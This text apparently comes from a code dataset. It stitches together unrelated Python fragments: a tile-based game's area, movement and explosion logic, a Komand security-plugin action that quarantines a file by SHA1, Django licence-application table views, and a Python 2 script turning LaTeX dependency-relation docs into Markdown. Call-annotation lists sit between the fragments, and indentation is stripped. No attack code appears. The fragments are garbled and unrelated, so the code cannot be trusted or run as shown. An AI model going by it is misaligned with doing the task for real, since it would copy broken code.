if nobj.updates:
self.ups.add((pos,nobj))
if nobj.targetable:
self.targets.add(nobj)
if nobj.coords:
nobj.coords.area=self
nobj.coords.pos=pos
else:
nobj.coords=Vector.Coordinate(self,pos)
nobj.on_spawn(self,pos)
return nobj
def spawn_new(self,oc,pos,*args):
return self.spawn(oc(Vector.Coordinate(self,pos),*args),pos)
def spawn_item(self,item,pos):
self.spawn_new(Items.ItemObject,pos,item)
def set_tile(self,tile,pos):
self.ldict["Tiles"][pos]=Tiles.tdict[tile]
def dest(self,layer,pos):
tobj=self.ldict[layer][pos]
self.dobj(tobj,pos)
def dobj(self,obj,pos):
if obj:
for l in obj.layers:
self.ldict[l].del_obj(pos)
obj.on_dest(self,pos)
if (pos,obj) in self.ups:
self.ups.remove((pos,obj))
if obj in self.targets:
self.targets.remove(obj)
def super_dest(self,pos):
for l in self.layers:
if l!="Tiles":
self.dest(l.name,pos)
def move(self,obj,pos,d,warped=False,override_speed=None,tpos_cache=None,re_layer=None):
tpos = tpos_cache or pos + d
tlayers=re_layer or obj.layers
if not self.infinite and not tpos.within(self.bounds):
if self.building and (not self.large or "Air" in obj.layers):
warp=self.building.out_warp(self,pos,d)
if warp:
return self.warp(warp, obj, pos, d,warped,override_speed)
return False
blocked=False
for l in tlayers:
o=self.get(l, tpos)
if o:
blocked=True
warp=o.in_warp(d)
if warp:
return self.warp(warp,obj,pos,d,warped,override_speed)
elif isinstance(obj,Items.ItemObject) and o.input(d,obj.item):
if not warped:
self.dobj(obj, pos)
for l in obj.layers:
self.ldict[l].outobjs[tpos] = obj
obj.lmo = -d
obj.mprog = 64
obj.aspeed = override_speed or obj.mspeed
self.mups.add(obj)
return True
if blocked or not self.supported(obj, tpos):
return False
if not warped:
self.dobj(obj,pos)
if re_layer:
obj.lmo=-d-V(0,(self.ldict[re_layer[0]].off-self.ldict[obj.layers[0]].off)/64)
obj.layers=re_layer
else:
obj.lmo = -d
self.spawn(obj, tpos)
if warped:
for l in obj.layers:
self.ldict[l].outobjs[tpos] = obj
obj.mprog=64
obj.aspeed=override_speed or obj.mspeed
return True
def warp(self,warp,obj,pos,d,warped,ospeed):
if warp.area.move(obj, warp.pos - d, d, True,ospeed):
if not warped:
self.dobj(obj, pos)
for l in obj.layers:
self.ldict[l].outobjs[pos + d] = obj
return True
return False
def render(self,surf,player,pos):
sr=surf.get_rect()
start, size = pos - V(sr.w // 128 + 1, sr.h // 128 + 2), V(sr.w // 64 + 2, sr.h // 64 + 3)
poss=list(size.iter_space_2d(start))
for l in self.layers:
l.render(surf,poss,start,-player.moveoff-V(64,128),self,player)
def update(self,events):
for p,o in set(self.ups):
o.update(p,self,events)
for p,o in self.ups:
o.mupdate()
for o in set(self.mups):
o.mupdate()
if not o.mprog:
self.mups.remove(o)
for l in self.layers:
l.update()
self.anitick+=1
self.anitick%=64
def de_update(self,obj,pos):
self.ups.remove((pos,obj))
obj.updates=False
def supported(self,obj,tpos):
if obj.slayer:
s=self.get(obj.slayer,tpos)
if bool(s and s.support)==obj.inverse_support:
return False
return True
def get(self,layer,pos):
return self.ldict[layer][pos]
def clear(self,layer,pos):
return (self.infinite or pos.within(self.bounds)) and not self.get(layer,pos)
def warped(self,pos,d):
return False
def has_player(self):
for p,o in self.ups:
if o.area:
if o.area.has_player():
return True
if o.name=="Player":
return True
def respawn(self,p):
locs=list(self.bounds.iter_space_2d(Vector.zero))
shuffle(locs)
for tpos in locs:
if self.clear("Objects",tpos):
self.spawn(p,tpos)
return
raise RuntimeError("COULD NOT SPAWN PLAYER ANYWHERE")
def create_exp(self, fpos, r, exps,exptier=1, expeffect=None):
if exps == "Cross":
self.explode(fpos,exptier,expeffect)
for dpos in Vector.vdirs:
pos = fpos + dpos
for n in range(r):
if not self.explode(pos,exptier, expeffect):
break
pos += dpos
elif exps == "Square":
for pos in [fpos + v - V(r, r) for v in (V(r, r) * 2 + V(1, 1)).iter_space()]:
                self.explode(pos, exptier, expeffect)
elif exps == "Circle":
for pos in [fpos + v - V(r, r) for v in (V(r, r) * 2 + V(1, 1)).iter_space()]:
if (fpos - pos).rlen < r + 0.5:
                    self.explode(pos, exptier, expeffect)
exp.play()
def explode(self, pos,exptier, expeffect=None):
rt=False
for l in self.layers:
o=self.get(l.name,pos)
if (not o or o.explode(self,pos,exptier)) and l.name=="Objects":
rt=True
if rt:
self.add_exp(pos,expeffect)
return rt
def add_exp(self, pos, expeffect):
se = True
# if expeffect == "Nuclear" and not randint(0, 2):
# self.change_t(pos, "RadGoop")
# elif expeffect == "Incendiary" and randint(0, 3):
# self.spawn(Enemies.Fire(pos))
# se = False
if se:
self.spawn_new(War.Explosion,pos)
def get_power(self,needed):
prov=min(needed,self.ebuffer)
self.ebuffer-=prov
return prov
def generate(self,gfunc):
if self.large:
return 0
self.ebuffer+=gfunc(self.emax-self.ebuffer)
def __getitem__(self, item):
return self.ldict[item]
class LargeArea(Area):
large = True
def __init__(self,bounds,generator,planet):
super().__init__(bounds,generator,planet)
self.explored=set()
def render(self,surf,player,pos):
sr=surf.get_rect()
start, size = pos - V(sr.w // 128 + 1, sr.h // 128 + 2), V(sr.w // 64 + 2, sr.h // 64 + 3)
poss=list(size.iter_space_2d(start))
for v in poss:
self.ping(v)
for l in self.layers:
l.render(surf,poss,start,-player.moveoff-V(64,128),self,player)
def ping(self,pos):
if pos not in self.explored:
if pos.within(self.bounds):
self.gen.gen_pos(self,pos)
self.explored.add(pos)
def get(self,layer,pos):
self.ping(pos)
return self.ldict[layer][pos]
class InfiniteArea(Area):
infinite = True
large = True
def __init__(self,generator):
super().__init__(None,generator,None)
self.explored=set()
def render(self,surf,player,pos):
sr=surf.get_rect()
start, size = pos - V(sr.w // 128 + 1, sr.h // 128 + 2), V(sr.w // 64 + 2, sr.h // 64 + 3)
poss=list(size.iter_space_2d(start))
for v in poss:
self.ping(v)
for l in self.layers:
l.render(surf,poss,start,-player.moveoff-V(64,128),self,player)
def ping(self,pos):
if pos not in self.explored:
self.gen.gen_pos(self,pos)
self.explored.add(pos)
def get(self,layer,pos):
self.ping(pos)
return self.ldict[layer][pos]
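# --- Hedged illustration, not part of the game module ---
# The name-keyed layer lookup (self.ldict) built in Area.__init__ is what
# get(), spawn(), and set_tile() index into; the minimal stand-in below only
# demonstrates that access pattern and is an illustrative assumption.
# class _GridLayer(object):                     # stand-in for Layers.Layer
#     def __init__(self, name): self.name, self._cells = name, {}
#     def __getitem__(self, pos): return self._cells.get(pos)
#     def __setitem__(self, pos, obj): self._cells[pos] = obj
# ldict = {l.name: l for l in [_GridLayer("Tiles"), _GridLayer("Objects")]}
# ldict["Objects"][(3, 4)] = "drill"
# assert ldict["Objects"][(3, 4)] == "drill"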
|
[
"Lib.Img.sndget",
"random.shuffle",
"Lib.Vector.Coordinate"
] |
[((195, 213), 'Lib.Img.sndget', 'Img.sndget', (['"""bomb"""'], {}), "('bomb')\n", (205, 213), False, 'from Lib import Vector, Img\n'), ((5649, 5662), 'random.shuffle', 'shuffle', (['locs'], {}), '(locs)\n', (5656, 5662), False, 'from random import shuffle\n'), ((1204, 1232), 'Lib.Vector.Coordinate', 'Vector.Coordinate', (['self', 'pos'], {}), '(self, pos)\n', (1221, 1232), False, 'from Lib import Vector, Img\n'), ((1351, 1379), 'Lib.Vector.Coordinate', 'Vector.Coordinate', (['self', 'pos'], {}), '(self, pos)\n', (1368, 1379), False, 'from Lib import Vector, Img\n')]
|
import komand
from .schema import StopAndQuarantineFileInput, StopAndQuarantineFileOutput
# Custom imports below
class StopAndQuarantineFile(komand.Action):
def __init__(self):
super(self.__class__, self).__init__(
name='stop_and_quarantine_file',
description='Stop execution of a file on a machine and delete it',
input=StopAndQuarantineFileInput(),
output=StopAndQuarantineFileOutput())
def run(self, params={}):
self.logger.info("Running...")
machine_id = params.get("machine_id")
sha1_id = params.get("sha1")
comment = params.get("comment")
self.logger.info("Attempting to stop and quarantine file: " + sha1_id)
self.logger.info("Attempting to stop and quarantine file on machine: " + machine_id)
response = self.connection.stop_and_quarantine_file(machine_id, sha1_id, comment)
return {"stop_and_quarantine_response": komand.helper.clean(response)}
# def test(self):
# # TODO: Implement test function
# return {}
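# --- Hedged usage sketch, not part of the plugin ---
# In the Komand/InsightConnect runtime the framework supplies self.connection
# before run() is called; the identifiers below are illustrative assumptions.
# action = StopAndQuarantineFile()
# action.connection = connection              # injected by the framework
# action.run({'machine_id': 'machine-123',
#             'sha1': 'da39a3ee5e6b4b0d3255bfef95601890afd80709',
#             'comment': 'quarantine requested by SOC'})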
|
[
"komand.helper.clean"
] |
[((973, 1002), 'komand.helper.clean', 'komand.helper.clean', (['response'], {}), '(response)\n', (992, 1002), False, 'import komand\n')]
|
from wildlifelicensing.apps.applications.models import Application
from wildlifelicensing.apps.dashboard.views import officer
from wildlifelicensing.apps.main.models import WildlifeLicence
from wildlifelicensing.apps.returns.models import Return
class DataTableApplicationView(officer.DataTableApplicationsOfficerView):
def get_initial_queryset(self):
return Application.objects.filter(applicant_profile__user=self.args[0]).exclude(processing_status='draft')
class DataTableLicencesView(officer.DataTableLicencesOfficerView):
def get_initial_queryset(self):
return WildlifeLicence.objects.filter(holder=self.args[0])
class DataTableReturnsView(officer.DataTableReturnsOfficerView):
def get_initial_queryset(self):
return Return.objects.filter(licence__holder=self.args[0]).exclude(status='future')
|
[
"wildlifelicensing.apps.main.models.WildlifeLicence.objects.filter",
"wildlifelicensing.apps.returns.models.Return.objects.filter",
"wildlifelicensing.apps.applications.models.Application.objects.filter"
] |
[((593, 644), 'wildlifelicensing.apps.main.models.WildlifeLicence.objects.filter', 'WildlifeLicence.objects.filter', ([], {'holder': 'self.args[0]'}), '(holder=self.args[0])\n', (623, 644), False, 'from wildlifelicensing.apps.main.models import WildlifeLicence\n'), ((373, 437), 'wildlifelicensing.apps.applications.models.Application.objects.filter', 'Application.objects.filter', ([], {'applicant_profile__user': 'self.args[0]'}), '(applicant_profile__user=self.args[0])\n', (399, 437), False, 'from wildlifelicensing.apps.applications.models import Application\n'), ((763, 814), 'wildlifelicensing.apps.returns.models.Return.objects.filter', 'Return.objects.filter', ([], {'licence__holder': 'self.args[0]'}), '(licence__holder=self.args[0])\n', (784, 814), False, 'from wildlifelicensing.apps.returns.models import Return\n')]
|
import re
import sys
depRelHeader="""\
## %s : %s
"""
oneDepFig="""
<div class="sd-parse">
%s
%s(%s, %s)
</div>
"""
header="""\
---
layout: base
title: '%(relname)s'
shortdef : '%(shortdef)s'
---
"""
footer=""
### {\emph{advcl}: adverbial clause modifier}
relRe=re.compile(r"\{\\emph\{(.*?)\}:\s+(.*)\}\\\\$") #matches "advcl" and "adverb....ier" as two groups
### tabbing fig text
### \> ``Sam took out a 3 million dollar loan'' \> \> \emph{amod}(loan, dollar)\\
tabFigLine=re.compile(r"\\> +``(.*?)'' +\\> *\\> +\\emph\{(.*?)\}\((.*?), ?(.*?)\) *\\\\")
### \begin{deptext}[column sep=0.2em] Sam \&, \& my \& brother \& , \& arrived \\ \end{deptext}
depTextRe=re.compile(r"\\begin\{deptext\}(\[.*?\])? *(.*?)\\end\{deptext\}")
#\depedge[edge unit distance=0.5ex]{1}{4}{appos}
depEdgeRe=re.compile(r"\\depedge(\[.*?\])?\{([0-9]+)\}\{([0-9]+)\}\{(.*?)\}")
punctRe=re.compile(r"([.,!?])(?=( |$))")
class Relation:
"""I hold everything related to one relation in here, in case I want to
reorder them somehow, etc..."""
def __init__(self,name,definition):
self.name=name
self.definition=definition
self.text=depRelHeader%(name,definition)
def readDepFig(self,textIn):
# \begin{dependency}
# \begin{deptext}[column sep=0.2em]
# Sam \&, \& my \& brother \& , \& arrived \\
# \end{deptext}
# \depedge[edge unit distance=0.5ex]{1}{4}{appos}
# \end{dependency}
lines=""
while True:
line=textIn.next().strip()
if line==r"\end{dependency}":
break
lines+=" "+line
m=depTextRe.search(lines)
tokens=[t.strip() for t in m.group(2).replace(r"\\","").strip().split(r"\&")]
txt=" ".join(tokens)
self.text+="""\n\n<div class="sd-parse">\n"""
self.text+=txt+"\n"
for m in depEdgeRe.finditer(lines):
src=int(m.group(2))
target=int(m.group(3))
dType=m.group(4)
self.text+=dType+"("+tokens[src-1]+"-"+str(src)+", "+tokens[target-1]+"-"+str(target)+")\n"
self.text+="""</div>\n\n"""
def readTabbingFig(self,textIn):
while True:
line=textIn.next().strip()
if line.startswith(r"\hspace"):
continue
match=tabFigLine.match(line)
if match:
txt,dType,g,d=match.groups()
print >> sys.stderr, txt
txt=punctRe.sub(r" \1",txt).replace(r"\\","")
g=g.replace("\\","")
d=d.replace("\\","")
print >> sys.stderr, txt
print >> sys.stderr
self.text+=oneDepFig%(txt,dType,g,d)
continue
if line==r"\end{tabbing}":
return
print >> sys.stderr, "Spurious line: >>>"+line+"<<<"
def getText(self):
t=self.text
emphRe=re.compile(r"\\emph\{(.*?)\}")
t=emphRe.sub(r"*\1*",t)
quoteRe=re.compile(r"``(.*?)''")
t=quoteRe.sub(r'"\1"',t)
return t
relations={} #relType -> Relation()
currRel=None
while True:
try:
line=sys.stdin.next().strip()
except StopIteration: #Done!
break
#New relation?
match=relRe.search(line)
if match: #new relation
currRel=Relation(*match.groups())
assert currRel.name not in relations
relations[currRel.name]=currRel
continue
#Figure in tabbing?
if line.startswith(r"\begin{tabbing}"):
currRel.readTabbingFig(sys.stdin)
continue
if line.startswith(r"\begin{dependency}"):
currRel.readDepFig(sys.stdin)
continue
if line.startswith("%ENDRELS"):
break
if line.startswith("%") or line.startswith(r"\begin") or line.startswith(r"\end"):
continue
if currRel:
currRel.text+=line+" "
for r in sorted(relations):
f=open("../_en/"+r+".md","wt")
print >> f, header%{"relname":r,"shortdef":relations[r].definition}
print >> f, relations[r].getText()
print >> f, footer
f.close()
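# --- Hedged illustration, not part of the script ---
# Example of what relRe extracts from a typical definition line; the sample
# line is an illustrative assumption about the LaTeX source.
# >>> m = relRe.search(r"{\emph{advcl}: adverbial clause modifier}\\")
# >>> m.groups()
# ('advcl', 'adverbial clause modifier')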
|
[
"sys.stdin.next",
"re.compile"
] |
[((271, 328), 're.compile', 're.compile', (['"""\\\\{\\\\\\\\emph\\\\{(.*?)\\\\}:\\\\s+(.*)\\\\}\\\\\\\\\\\\\\\\$"""'], {}), "('\\\\{\\\\\\\\emph\\\\{(.*?)\\\\}:\\\\s+(.*)\\\\}\\\\\\\\\\\\\\\\$')\n", (281, 328), False, 'import re\n'), ((486, 590), 're.compile', 're.compile', (['"""\\\\\\\\> +``(.*?)\'\' +\\\\\\\\> *\\\\\\\\> +\\\\\\\\emph\\\\{(.*?)\\\\}\\\\((.*?), ?(.*?)\\\\) *\\\\\\\\\\\\\\\\"""'], {}), '(\n "\\\\\\\\> +``(.*?)\'\' +\\\\\\\\> *\\\\\\\\> +\\\\\\\\emph\\\\{(.*?)\\\\}\\\\((.*?), ?(.*?)\\\\) *\\\\\\\\\\\\\\\\"\n )\n', (496, 590), False, 'import re\n'), ((673, 748), 're.compile', 're.compile', (['"""\\\\\\\\begin\\\\{deptext\\\\}(\\\\[.*?\\\\])? *(.*?)\\\\\\\\end\\\\{deptext\\\\}"""'], {}), "('\\\\\\\\begin\\\\{deptext\\\\}(\\\\[.*?\\\\])? *(.*?)\\\\\\\\end\\\\{deptext\\\\}')\n", (683, 748), False, 'import re\n'), ((799, 875), 're.compile', 're.compile', (['"""\\\\\\\\depedge(\\\\[.*?\\\\])?\\\\{([0-9]+)\\\\}\\\\{([0-9]+)\\\\}\\\\{(.*?)\\\\}"""'], {}), "('\\\\\\\\depedge(\\\\[.*?\\\\])?\\\\{([0-9]+)\\\\}\\\\{([0-9]+)\\\\}\\\\{(.*?)\\\\}')\n", (809, 875), False, 'import re\n'), ((876, 907), 're.compile', 're.compile', (['"""([.,!?])(?=( |$))"""'], {}), "('([.,!?])(?=( |$))')\n", (886, 907), False, 'import re\n'), ((2904, 2937), 're.compile', 're.compile', (['"""\\\\\\\\emph\\\\{(.*?)\\\\}"""'], {}), "('\\\\\\\\emph\\\\{(.*?)\\\\}')\n", (2914, 2937), False, 'import re\n'), ((2983, 3006), 're.compile', 're.compile', (['"""``(.*?)\'\'"""'], {}), '("``(.*?)\'\'")\n', (2993, 3006), False, 'import re\n'), ((3143, 3159), 'sys.stdin.next', 'sys.stdin.next', ([], {}), '()\n', (3157, 3159), False, 'import sys\n')]
|